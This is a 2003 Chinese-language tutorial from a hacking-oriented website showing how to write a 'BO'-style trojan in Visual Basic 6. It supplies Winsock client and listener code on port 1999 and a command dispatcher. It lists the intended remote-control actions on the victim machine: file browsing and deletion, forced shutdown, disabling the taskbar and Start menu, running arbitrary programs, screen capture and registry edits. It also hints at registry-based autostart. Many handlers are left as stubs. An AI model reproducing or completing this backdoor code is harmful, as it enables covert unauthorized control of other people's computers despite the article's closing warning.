会员: 密码:  免费注册 | 忘记密码 | 会员登录 网页功能: 加入收藏 设为首页 网站搜索  
 安全技术技术文档
  · 安全配制
  · 工具介绍
  · 黑客教学
  · 防火墙
  · 漏洞分析
  · 破解专题
  · 黑客编程
  · 入侵检测
 安全技术论坛
  · 安全配制
  · 工具介绍
  · 防火墙
  · 黑客入侵
  · 漏洞检测
  · 破解方法
  · 杀毒专区
 安全技术工具下载
  · 扫描工具
  · 攻击程序
  · 后门木马
  · 拒绝服务
  · 口令破解
  · 代理程序
  · 防火墙
  · 加密解密
  · 入侵检测
  · 攻防演示
技术文档 > VB文档 > 网络编程
浅谈用VB6.0编写BO程序
发表日期:2003-07-10 00:00:00作者: 出处:  

---- BO又称“特洛伊木马”, 是在美国一次黑客技术讨论会上由一个黑客组织推出的。它其实是一种客户机/服务器程序,其利用的原理就是:在本机直接启动运行的程序拥有与使用者相同的权限。因此如果能够启动服务器端(即被攻击的计算机)的服务器程序,就可以使用相应的客户端工具客户程序直接控制它了。下面来谈谈如何用VB来实现它。

---- 使用VB建立两个程序,一个为客户端程序Client,一个为服务器端程序systry。

---- 在Client工程中建立一个窗体,加载WinSock控件,称为tcpClient,协议选择TCP,再加入两个文本框,用以输入服务器的IP地址或服务器名,然后建立一个按钮,按下之后就可以对连接进行初始化了,代码如下:

Private Sub cmdConnect_Click()

  If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then

    MsgBox ("请输入主机名或主机IP地址。")

    Exit Sub

   Else

    If Len(Text1.Text) > 0 Then

      tcpClient.RemoteHost = Text1.Text

     Else

      tcpClient.RemoteHost = Text2.Text

    End If

  End If

  tcpClient.Connect

  Timer1.Enabled = True  

End Sub

---- 连接建立之后就可以使用DataArrival事件处理所收到的数据了。

---- 在服务器端systry工程也建立一个窗体,加载WinSock控件,称为tcpServer,协议选择TCP,在Form_Load事件中加入如下代码:

Private Sub Form_Load()

  tcpServer.LocalPort = 1999

  tcpServer.Listen

End Sub

---- 准备应答客户端程序的请求连接,使用ConnectionRequest事件来应答户端程序的请求,代码如下:

Private Sub tcpServer_ConnectionRequest

(ByVal requestID As Long)

   If tcpServer.State < > sckClosed Then

    tcpServer.Close‘检查控件的 State 属性是否为关闭的。

   End If   '如果不是,在接受新的连接之前先关闭此连接。

   tcpServer.Accept requestID

End Sub

---- 这样在客户端程序按下了连接按钮后,服务器端程序的ConnectionRequest事件被触发,执行了以上的代码。如果不出意外,连接就被建立起来了。

---- 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如:把服务器端的驱动器名、目录名、文件名等传到客户机端,客户机端接收后用TreeView控件以树状的形式显示出来,浏览服务器端文件目录;强制关闭或重启服务器端的计算机;屏蔽任务栏窗口;屏蔽开始菜单;按照客户机端传过来的文件名或目录名,而删除它;屏蔽热启动键;运行服务器端的任何程序;还包括获取目标计算机屏幕图象、窗口及进程列表;激活、终止远端进程;打开、关闭、移动远端窗口;控制目标计算机鼠标的移动与动作;交换远端鼠标的左右键;在目标计算机模拟键盘输入,下载、上装文件;提取、创建、修改目标计算机系统注册表关键字;在远端屏幕上显示消息。DataArrival事件程序如下:

Private Sub tcpServer_DataArrival

(ByVal bytesTotal As Long)

  Dim strData As String

  Dim i As Long

  Dim mKey As String

  tcpServer.GetData strData 

‘接收数据并存入strData

  For i = 1 To Len(strData) 

‘分离strData中的命令

 If Mid(strData, i, 1) = "@" Then

  mKey = Left(strData, i - 1)

‘把命令ID号存入mKey

    

‘把命令参数存入strData 

strData = Right(strData, Len(strData) - i)

      Exit For

     End If

   Next i  

  Select Case Val(mKey)

    Case 1

      ‘驱动器名、目录名、文件名

    Case 2

      强制关闭服务器端的计算机

    Case 3

      强制重启服务器端的计算机

    Case 4

      屏蔽任务栏窗口;

    Case 5

      屏蔽开始菜单;

    Case 6

      按照客户机端传过来的文件名或目录名,而删除它;

    Case 7

      屏蔽热启动键;

    Case 8

      运行服务器端的任何程序

  End Select  

End Sub

详细程序略。

---- 客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数,它们用符号“@”隔开。

---- 另外,当客户机端断开与服务器端的来接后,服务器端应用tcpServer_Close事件,来继续准备接收客户机端的请求,其代码如下:

Private Sub tcpServer_Close()

  tcpServer.Close

  tcpServer.Listen

End Sub

---- 这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在我的源程序中有一中方法,是修改系统注册表的方法。

---- 成功的特洛伊木马程序要比这个复杂一些,还有程序的隐藏、自动复制、传播等问题要解决。警告:千万不要用BO程序破坏别人的系统。

返回顶部】 【打印本页】 【关闭窗口

关于我们 / 给我留言 / 版权举报 / 意见建议 / 网站编程QQ群   
Copyright ©2003- 2024 Lihuasoft.net webmaster(at)lihuasoft.net 加载时间 0.00152